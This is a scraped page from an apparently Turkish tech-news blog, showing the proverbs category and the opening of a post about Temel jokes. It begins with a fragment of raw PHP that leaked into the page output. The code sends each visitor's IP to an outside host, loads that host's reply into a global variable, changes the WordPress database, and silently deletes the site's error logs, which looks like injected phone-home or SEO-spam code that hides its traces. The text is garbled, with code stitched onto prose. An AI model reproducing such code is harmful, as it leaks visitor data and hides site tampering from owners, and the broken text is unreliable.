$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> atasözleri | Teknoloji Haberleri

atasözleri kategorisindeki tüm yazılar

Son Yazılar

Temel Fıkraları

Fıkra dediğimizde çoğumuzun aklına Karadeniz gelir. Karadeniz’in gelmesi konusunda da kimse yadırganamaz. Çünkü komik fıkraların kaynağı olan Karadeniz’de fıkrada geçen bir Temel vardır. Temelin bazen karısı bazen de sevgilisi Fadime olur. Temelin her zaman da yanında arkadaşları bulunur. Bir arkadaşının adı İdris, diğerinin ise Dursun’dur.   Temel’in